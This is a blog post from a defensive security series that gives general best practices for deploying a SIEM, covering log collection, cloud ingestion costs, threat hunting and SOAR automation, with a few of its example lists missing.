(A thought from The Matrix: Neo likely used a SIEM before he took the red pill and could see the matrix without one...)
One of the best ways to monitor security-related activities for your organization is to collect audit logs from every network device and analyze those logs for activities which violate acceptable behavior. This is precisely the role of a SIEM or Security Information and Event Manager.
Let me simplify your life by providing some best practice suggestions for deploying and using a SIEM.
When enterprise SIEM solutions started appearing in the early 2000s) the only option was to build them on servers in your data center. This task was not simple, as configuration and scaling for high log ingestion rates require a fair learning curve. Although on-prem SIEM solutions still exist, most organizations are choosing to move to the cloud, which is very good at automatically scaling performance and ensuring 100% uptime.
The largest cost of using a cloud-based SIEM is the ingestion cost. Collecting millions or even billions of events per day will quickly incur costs into the thousands of dollars. However, choosing a solution that offers data summarization and alternate storage solutions can make a big difference in controlling those costs. For example, some SIEMs provide multi-tiered storage options such as:
Develop a process for prioritizing, collecting, parsing, correlating, and reporting your logs. Eighty percent of the effort in setting up a SIEM is configuring good logging.
A good SIEM provides out-of-the-box support for most common log sources. This support includes data connectors for pulling in the logs, correlations for detecting threats and non-compliant activities, and reports for seeing a range of information that gives a broad visual to the activities in the logs.
SIEMs often provide additional "metadata," which complements the information in the logs and provides better context for correlations to decide if malicious activity is occurring. Some examples are:
Threat Hunting provides a proactive and reactive method for investigating threat activity that may not be presented within the SIEM correlation's alert details. An experienced SOC analyst can perform threat hunts manually or automatically by executing a few or hundreds of pre-defined search queries. AI is also becoming a new tool in automated threat hunts (e.g. Microsoft's Copilot for Security).
Analyzing billions of logs per day and expecting perfect correlations with no false positives is unrealistic. This is where SOAR (Security Orchestration Automation and Response) comes in. Automation can be developed to replace the repetitive steps of a SOC operator in the first stages of an investigation. Artificial Intelligence is also starting to play a part in making it easier to develop SOAR investigative workflows. In the past, many organizations realized that developing SOAR workflows could require significant effort and knowledge. However, AI is beginning to offer some additional tools to simplify the automated investigation process.
A SIEM is one of the central tools used by a Security Operations team. A strong understanding of log processing is required to both configure and operationalize a SIEM. AI is becoming a game-changer as a SOAR component of SIEM.
References
About This Blog Series
Follow the full series here: Building Defenses with Modern Security Solutions
This series discusses a list of key cybersecurity defense topics. The full collection of posts and labs can be used as an educational tool for implementing cybersecurity defenses.
Labs
For quick walkthrough labs on the topics in this blog series, check out the story of “ZPM Incorporated” and their steps to implementing all the solutions discussed here.
Compliance
All topics mentioned in this series have been mapped to several compliance controls here.